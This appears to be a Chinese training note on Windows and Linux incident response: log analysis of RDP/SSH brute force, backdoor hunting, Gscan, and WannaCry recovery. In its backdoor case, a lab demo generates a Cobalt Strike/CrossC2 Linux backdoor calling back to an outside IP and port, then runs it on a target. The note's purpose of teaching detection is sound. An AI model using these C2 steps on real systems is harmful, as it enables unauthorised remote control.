操作系统(windows,linux)应急响应:
1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕
虫,勒索等)。
2.常见分析:计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题常见日志类别及存储:
Windows,Linux补充资料:
https://xz.aliyun.com/t/485
https://www.secpulse.com/archives/114019.html
https://docs.microsoft.com/en-us/sysinternals/病毒分析
PCHunter:http://www.xuetr.com
火绒剑:https://www.huorong.cn
Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker:https://processhacker.sourceforge.io/downloads.php
autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL:https://www.bleepingcomputer.com/download/otl/
SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector病毒查杀
卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛:http://free.drweb.ru/download+cureit+free
火绒安全软件:https://www.huorong.cn
360 杀毒:http://sd.360.cn/download_center.html病毒动态
CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn
微步在线威胁情报社区:https://x.threatbook.cn
火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html
爱毒霸社区:http://bbs.duba.net
腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html在线病毒扫描网站
http://www.virscan.org //多引擎在线病毒扫描网
https://habo.qq.com //腾讯哈勃分析系统
https://virusscan.jotti.org //Jotti 恶意软件扫描系统
http://www.scanvir.com //计算机病毒、手机病毒、可疑文件分析

案例 1-攻击响应-暴力破解(RDP,SSH)-Win,Linux

Windows-LogFusion 载入查看:
事件归类,事件 ID,事件状态等,参考百度资料Linux-grep 筛选:
1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -13、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-
4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-
9]?)"|uniq -c | sort -nr4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -
nr5、登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

windows下可以通过第三方工具LogFusion查看日志

对Windows服务器RDP远程桌面进行爆破

通过LogFusion查看当前日志可以发现,有一个用户在疯狂尝试对本地的RPD进行连接

linux下攻击者对ssh端口进行爆破时

可以通过命令grep -o "Failed password" /var/log/secure|uniq -c
通过关键字对日志进行统计筛选,确认服务器遭到多少次爆破攻击

通过命令grep "Failed password" /var/log/secure|head -1
查看日志中第一次出现关键字Failed password的信息,确认攻击者第一次爆破的时间

通过命令grep "Failed password" /var/log/secure|tail -1
查看日志中第一次出现关键字Failed password的信息,确认攻击者最后一次爆破的时间

查看哪些ip尝试进行爆破
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0- 4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0- 9]?)"|uniq -c | sort -nr

查看攻击者尝试爆破的字典
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort - nr

通过对日志文件中关键字Accepted进行筛选,查看攻击者成功登陆的日期时间

案例 2-控制响应-后门木马(Webshell,PC)-Win,Linux

windows:默认配置测试linux 借助 CrossC2 项目:netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon参考过程:http://www.adminxe.com/1287.html1.项目上传至服务端目录,给予执行权限
2.配置监听器:
windows/beacon_https/reverse_https 阿里云记得端口放行
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及 windows 日志分析或执行记录查找后门问题

Windows

首先启动cs,连接上后设置一个监听器

生成后门

将后门绑定到刚才设置的监听器上

目标windows机执行后,cs处上线
通过PCHunter64工具查看当前的进程,进行筛选分析

linux

下载cs的linux插件

将插件放到cs服务端的目录中,并赋予执行权限

服务端启动cs

本地端连接cs,并生成https监听器


重新打开一个cs服务端的终端窗口,进入cs目录
通过之前上传的genCrossC2.Linux插件生成名为C2的linux后门
此处ip与端口需要与本地cs监听器中设置的保持一致

将cs生成的后门C2上传到对方linux上,赋予执行权限并执行

本地端cs处看到回显,对方linux主机上线

案例 3-自动化响应检测-Gscan 多重功能脚本测试-Linux

首先通过yum -y install git安装git

通过git下载Gscan

下载完后进入Gscan目录,用python3去运行GScan.py文件

运行后Gscan会对当前电脑自动进行检测

案例 4-危害响应-病毒感染(勒索 WannaCry)-Windows

https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
可通过360在线网站对病毒修改的文件进行识别并还原

应急响应-winlinux分析后门勒索病毒攻击相关推荐

  1. p74 应急响应-winlinux 分析后门勒索病毒攻击

    数据来源 操作系统(windows,linux)应急响应: 常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕虫,勒索等) 常见分析:计算机账户,端 ...

  2. 第74天-应急响应-winlinux 分析后门勒索病毒攻

    思维导图 知识点 操作系统(windows,linux)应急响应: 1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕 虫,勒索等). 2.常见 ...

  3. 被勒索病毒攻击后,有没有必要做溯源分析?

    勒索病毒又火了,黑客凭借对kaseya勒索软件攻击,造成1000家公司受害,这些公司遍布在美国.英国.加拿大.南非等最少17个公家,其中瑞典最大的连锁超市COOP超过800家实体店在这次攻击事件中关门 ...

  4. 宏碁再次遭遇勒索病毒攻击、谷歌分析8000万个勒索软件样本|10月15日全球网络安全热点

    安全资讯报告 MyKings僵尸网络仍然活跃并赚取大量资金 MyKings僵尸网络(又名Smominru或DarkCloud)仍在积极传播,在它首次出现在野外五年后,通过加密货币赚取了大量资金. 作为 ...

  5. 2022 医疗卫生行业应急响应形势分析报告 脱敏板

    声明 本文是学习2022医疗卫生行业网络安全分析报告. 而整理的学习笔记,分享出来希望更多人受益,如果存在侵权请及时联系我们 医疗卫生行业应急响应形势分析 2021年1-12月,奇安信集团安服团队共参 ...

  6. 数据库比特币勒索病毒攻击警示,云和恩墨技术通讯六月刊精选

    各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(6月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...

  7. 基于ATTCK框架解析勒索病毒攻击

    ATT&CK框架 1. 初始访问阶段 2. 执行阶段 3. 持久化阶段 4. 提升权限阶段 5. 防御绕过阶段 6. 凭证访问阶段 7. 发现阶段 8. 横向移动阶段 9. 收集阶段 10. ...

  8. 一次勒索病毒攻击,让1500万用户“停跑”

    握有勒索病毒的黑客,再次展示了他们惊人的破坏力. 7月23号晚上,越来越多Garmin(佳明)智能手表的用户突然发现,自己的智能手表无法与手机上的配套APP"Garmin Connect&q ...

  9. 服务器被勒索病毒攻击怎么办,如何进行勒索病毒解密与预防工作?

    在当今社会中服务器已经成为企业关键数据存储和传输的重要载体,同样也成为黑客攻击和勒索病毒的首要目标.一旦服务器被勒索病毒攻击,企业的正常运转与经济利益和核心数据都将受到威胁.下面将为大家介绍一下服务器 ...

  10. 服务器中了勒索病毒,malox勒索病毒的加密方式及如何应对勒索病毒攻击

    随着计算机技术的发展,计算机成为现代人工作和生活中必不可少的电子产品.但随着很多企业和个人用户的信息化建设不断升级,也经常会出现许多恶意软件.其中包括malox勒索病毒,malox勒索病毒是mallo ...

最新文章

  1. 从父页面在iframe中调用JavaScript代码
  2. 最全mysql的复制和读写分离
  3. MySQL选择数据库(MySQL USE语句)
  4. Thread Safety in the Standard C++ Library
  5. 部署在SAP ABAP服务器上的SAP UI5应用,从bsp redirect(重定向)到ui5_ui5的原因分析
  6. 不会玩电脑怎么学计算机,不会玩电脑怎么学
  7. 计算机基础职教云答案,计算机基础课程答案
  8. python常用第三方库(转载)
  9. STM32的2.02固件库提供的启动文件详解 stm32f10x_vector.s
  10. 基于谷歌街景多位数字识别技术:TensorFlow的车牌号识别系统
  11. bzoj 1605: [Usaco2008 Open]Crisis on the Farm 牧场危机(DP)
  12. python的设计哲学_Python的设计哲学
  13. Java 根据身份证号获取性别、年龄、出生日期等信息
  14. linux 动态扫描 数码管,数码管动态扫描显示01234567程序(三种方案)
  15. PostgreSQL数据库——Pigsty
  16. cocos2d-js 的 cc.callFunc 参数
  17. 解决控制面板卸载不了程序的问题
  18. 无线充电线圈绕制注意事项
  19. 二维码支付码的工作原理那点事
  20. 阿拉伯数字与中文数字的相互转换

热门文章

  1. Ubuntu下搭建android开发环境
  2. 打印5列五颗星_55组“数学顺口溜”,孩子想学好数学必须背熟
  3. macOS: 卸载 Flash Player 迎接 2021
  4. windows service (三)打包安装服务
  5. jmail 发送html,jmail发送html格式的邮件
  6. 牛顿迭代法的图像推导思路以及代码
  7. 如何解决速达软件出现主键、单号、编码相同的报错
  8. 漫画:什么是二分查找?(修订版)
  9. java中移动光标怎么写_java 程序当中无法做到光标跟随
  10. u盘扩容盘用什么软件测试,扩容盘,小编教你如何检测U盘是否为扩容盘